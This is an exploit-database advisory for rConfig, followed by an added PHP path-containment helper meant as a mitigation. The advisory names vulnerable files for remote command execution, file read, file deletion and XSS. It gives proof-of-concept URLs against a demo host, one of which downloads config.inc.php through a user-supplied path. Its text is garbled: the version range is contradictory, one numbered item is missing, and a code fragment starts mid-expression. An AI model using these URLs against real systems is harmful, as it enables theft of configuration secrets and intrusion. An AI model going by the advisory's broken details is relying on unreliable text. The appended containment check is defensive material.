rConfig 3.1.1 <= 2.0 RCE & AFD & XSS Multiple Vulnerabilities

http://www.rconfig.com/

rConfig is a free, open source network device configuration management utility that lets network engineers take frequent configuration snapshots of their network devices. rConfig is unique because you choose which commands to run against your devices: configure rConfig with the list of commands you wish to apply to a category of devices, add devices to the category, create a scheduled task, and rConfig will do the rest. rConfig Version 3 also has a Configuration Compliance Management utility that lets you monitor device configurations for policy compliance.

Vulnerabilities:
===========================================================================
===========================================================================

1. Remote Command Execution
File: lib/ajaxHandlers/ajaxArchiveFiles.php

Download here

PoC v2:
http://demo.rconfig.com/v2/www/lib/crud/downloadFile.php?download_file=/home/r560544/demo/v2/config/config.inc.php

3. XSS:
http://demo.rconfig.com/v2/www/devicemgmt.php?deviceId=168&device=XSS

4. Arbitrary file read
File: lib/ajaxHandlers/ajaxGetFileByPath.php

5. Arbitrary File Deletion
File: lib/ajaxHandlers/ajaxDeleteAllLoggingFiles.php

    0) {
        $response = json_encode(array( 'failure' => true ));
    } else {
        $response = json_encode(array( 'success' => true ));
    }
    echo $response;
    ?>

(there is much more)

===========================================================================
===========================================================================
# Iranian Exploit DataBase = http://IeDb.Ir [2016-06-15]
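Added here as an illustrative mitigation (not rConfig's own code): a PHP containment check that a file download, read or delete handler can apply to a user-supplied path, so that a request cannot reach files such as config.inc.php outside the intended directory. The base directory, the extension allowlist and the helper name are assumptions for the example.

```php
<?php
// Added example, not rConfig's own code: canonicalise a requested path and
// accept it only when it stays inside the handler's base directory.

/**
 * Return the canonical path of $requested if it lies inside $baseDir and has
 * an allowed extension; otherwise return null (caller then refuses the request).
 */
function resolve_contained_path(string $baseDir, string $requested, array $allowedExt): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                       // base directory must exist
    }
    // Only a name relative to the base directory is ever legitimate: refuse
    // empty names, NUL bytes and absolute paths before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false || $requested[0] === '/') {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;                       // missing file, or a directory
    }
    // realpath() has collapsed ".." segments and symlinks, so a prefix test
    // on the canonical path is now a reliable containment check.
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // escaped the base directory
    }
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;                       // e.g. PHP sources are never served
    }
    return $target;
}

// Constructed demonstration: a scratch tree with one servable backup and a
// sensitive file one level up (assumed layout, built here for the example).
$dir = sys_get_temp_dir() . '/rconfig_demo_' . getmypid();
mkdir($dir . '/backups', 0700, true);
file_put_contents($dir . '/backups/router1.cfg', "hostname router1\n");
file_put_contents($dir . '/config.inc.php', "<?php // secret\n");

var_dump(resolve_contained_path($dir . '/backups', 'router1.cfg', ['cfg']));
var_dump(resolve_contained_path($dir . '/backups', '../config.inc.php', ['cfg']));
var_dump(resolve_contained_path($dir . '/backups', '/etc/passwd', ['cfg']));

unlink($dir . '/backups/router1.cfg');
unlink($dir . '/config.inc.php');
rmdir($dir . '/backups');
rmdir($dir);
```

Only the first call returns a path; the traversal and absolute-path requests both return null and the handler should answer with the same generic failure JSON the advisory's deletion fragment already uses.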